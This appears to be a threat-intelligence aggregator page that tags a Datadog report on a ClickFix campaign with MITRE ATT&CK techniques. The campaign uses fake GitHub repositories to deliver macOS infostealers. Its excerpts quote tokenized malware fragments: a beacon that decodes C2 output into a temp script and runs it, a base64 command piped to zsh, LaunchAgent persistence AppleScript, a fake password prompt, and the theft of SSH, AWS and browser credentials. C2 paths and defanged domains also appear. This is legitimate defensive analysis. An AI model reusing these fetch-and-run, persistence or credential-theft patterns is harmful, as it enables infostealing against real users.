TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Datadog Security Labs

Tech impersonators: ClickFix and MacOS infostealers

2026-02-10 · Read original ↗

ATT&CK techniques detected

26 predictions
T1555.003Credentials from Web Browsers
99%
“enter password for continue. " default answer " " with icon imagepath buttons { " continue " } default button " continue " giving up after 150 with title " system preferences " with hidden answer the infostealer traverses the filesystem and targets common documents and extensions…”
T1543.001Launch Agent
95%
“##36 @ hotmail. com duckymotby82 fulos5 fake application repositories : github. com / datadog - desktop - app github. com / atera - mac /. github github. com / 3commas - app /. github github. com / app - deploy - inst /. github github. com / quadency - pro file paths ( persistenc…”
T1204.004Malicious Copy and Paste
94%
“clickfix technique aligns with this model by shifting the execution decision to the victim through user - mediated command execution ( copy / paste into powershell / run on windows or terminal on macos ), often framed as a " verification " or " fix " step. this tradecraft reduces…”
T1059.004Unix Shell
93%
“resp " | sed - n ' s /. * " code " : " \ ( [ ^ " ] * \ ) ". * / \ 1 / p ' ) if [ - n " $ code " ] ; then echo " $ code " | base64 - d > / tmp /. c. sh & & chmod + x / tmp /. c. sh & & / tmp /. c. sh ; rm - f / tmp /. c. sh fi this script beacons to the c2 server every 60 seconds …”
T1204.001Malicious Link
91%
“твои google apps script web app url ( / exec ) const app _ url = " https : / / script. google [. ] com / macros / s / akfycbwip _ vgpeumbxewux _ oex6huimhfpxidiwehphr - fguqiqpcr - mamahc1jcuqyjne3n0q / exec " ; / / задержка после 100 % до редиректа ( мс ) const redirect _ delay …”
T1204.004Malicious Copy and Paste
89%
“. the url structure includes campaign tracking parameters, offer and shortlink, that identify the github repository lure and traffic redirect source : hxxps : / / drmcdermottmd [. ] com / salt - engine. html? offer = datadog & shortlink = q5vbjgvh & c = download _ app & pid = mac…”
T1555.003Credentials from Web Browsers
89%
“##fox - based browsers. notably, given the campaign ' s focus on technology - company branding, the infostealer targets cloud and developer - adjacent artifacts, including ssh material, aws credentials, kubernetes config, and shell history : on cloudkeys ( writemind ) try do shel…”
T1560.001Archive via Utility
86%
“zip / tmp / atomic _ asar. zip / tmp / ledger _ asar. zip / tmp / ledger _ live _ asar. zip / tmp / trezor _ asar. zip / tmp / app. asar sha256 stealer file hashes shub stealer v2. 0 9191101893e419eac4be02d416e4eed405ba2055441f36e564f09c19cb26271c”
T1204.004Malicious Copy and Paste
85%
“##9pbxblci1zdhjsazuuy29tl2xvywrlci5zad9idwlszd1jnmezzwexmjnkotbkmze1nzllymjkmzazmwe1mgfkmq = = ' | base64 - d ) | zsh after displaying a fake download url, the command decodes a base64 - encoded command - and - control url, downloads the script with curl, and pipes it directly to…”
T1059.004Unix Shell
84%
“/ loader. sh? build = { build _ id } / payload. applescript? build = { build _ id } / curl / { build _ id } / gate - exfiltration endpoint / api / bot / heartbeat - persistence beaconing endpoint / exodus - asar - trojanized exodus wallet / atomic - asar - trojanized atomic walle…”
T1056.002GUI Input Capture
78%
“dscl. authonly ) - a common credential validation technique used by macos infostealers. - a controlled retry loop with explicit bounds ( maxattempts = 10 ) - escalating error text after repeated failures ( " incorrect password … ( n / 10 ) " ) - use of a native system icon ( lock…”
T1543.001Launch Agent
74%
“##r & " googleupdate. app / contents / macos / " set plistdir to ( posix path of ( path to home folder ) ) & " library / launchagents / " do shell script " mkdir - p " & quoted form of appdir do shell script " mkdir - p " & quoted form of plistdir set scriptpath to appdir & " goo…”
T1059.002AppleScript
73%
“osascript ( applescript interpreter ). this is consistent with an execution flow where the next stage is a payload delivered over the network and executed via applescript without writing the script itself to disk. we assess this may reduce on - disk artifacts and evade file - bas…”
T1059.002AppleScript
73%
“" ) end try macsync concludes with a routine to target installed cryptocurrency wallet applications ( e. g., ledger / ledger live ). if the wallet is present under / applications, the applescript downloads a zip payload from securityfenceandwelding [. ] com, extracts replacement …”
T1204.002Malicious File
58%
“tech impersonators : clickfix and macos infostealers key points and observations - datadog identified an active campaign employing fake github repositories impersonating software companies and leveraging the clickfix initial access technique to social - engineer victims into inst…”
T1204.001Malicious Link
55%
“. the url structure includes campaign tracking parameters, offer and shortlink, that identify the github repository lure and traffic redirect source : hxxps : / / drmcdermottmd [. ] com / salt - engine. html? offer = datadog & shortlink = q5vbjgvh & c = download _ app & pid = mac…”
T1074.001Local Data Staging
53%
“" profile /. bash _ history " ) readwrite ( profile & " /. gitconfig ", writemind & " profile /. gitconfig " ) beyond typical browser and file collection, macsync also includes a routine that attempts to collect data from apple notes databases : try readwrite ( profile & " / libr…”
T1204.002Malicious File
52%
“clickfix technique aligns with this model by shifting the execution decision to the victim through user - mediated command execution ( copy / paste into powershell / run on windows or terminal on macos ), often framed as a " verification " or " fix " step. this tradecraft reduces…”
T1204.001Malicious Link
47%
“##r - mamahc1jcuqyjne3n0q / exec redirects to clickfix page : pmacos. onelink [. ] me / m5yy / q5vbjgvh pwin. onelink [. ] me / zmfc / dt38769z clickfix domains : drmcdermottmd [. ] com hci - outdoors [. ] com warboardgame [. ] com - windows download page tiptopmarine [. ] com sk…”
T1555.003Credentials from Web Browsers
44%
“" ) end try macsync concludes with a routine to target installed cryptocurrency wallet applications ( e. g., ledger / ledger live ). if the wallet is present under / applications, the applescript downloads a zip payload from securityfenceandwelding [. ] com, extracts replacement …”
T1566.002Spearphishing Link
41%
“redirect chain once a victim clicks the download link in the impersonating repository, they ' re redirected to a staging site hosted via github pages. this webpage mimics a github interface, complete with loading progress bar and commit graph animations. this convincing social - …”
T1204.001Malicious Link
40%
“months, this monitoring identified multiple malicious github repositories masquerading as legitimate desktop applications, including a repository themed as a " datadog desktop app ". hxxps : / / github [. ] com / datadog - desktop - app these impersonating repositories lack the a…”
T1608.005Link Target
36%
“months, this monitoring identified multiple malicious github repositories masquerading as legitimate desktop applications, including a repository themed as a " datadog desktop app ". hxxps : / / github [. ] com / datadog - desktop - app these impersonating repositories lack the a…”
T1059.007JavaScript
36%
“osascript ( applescript interpreter ). this is consistent with an execution flow where the next stage is a payload delivered over the network and executed via applescript without writing the script itself to disk. we assess this may reduce on - disk artifacts and evade file - bas…”
T1005Data from Local System
35%
“, " xls ", " xlsx ", " json ", " rdp " } shub ' s file grabber is also more controlled. in an attempt to reduce noise, it : - searches only common user folders ( desktop, documents, downloads ), - limits recursion ( - maxdepth 2 ), - limits file size ( - size - 5m ), - caps how m…”
T1005Data from Local System
35%
“##son / rdp ) are consistent with targeting users who work with exports, reports, internal datasets, and remote access. combined with the absence of explicit ~ /. ssh, ~ /. aws, and ~ /. kube grabs, this suggests shub is broadening beyond a " developer workstation " profile towar…”

Summary

Datadog identified an active campaign employing fake GitHub repositories impersonating software companies and leveraging the ClickFix initial access technique to deliver macOS infostealers.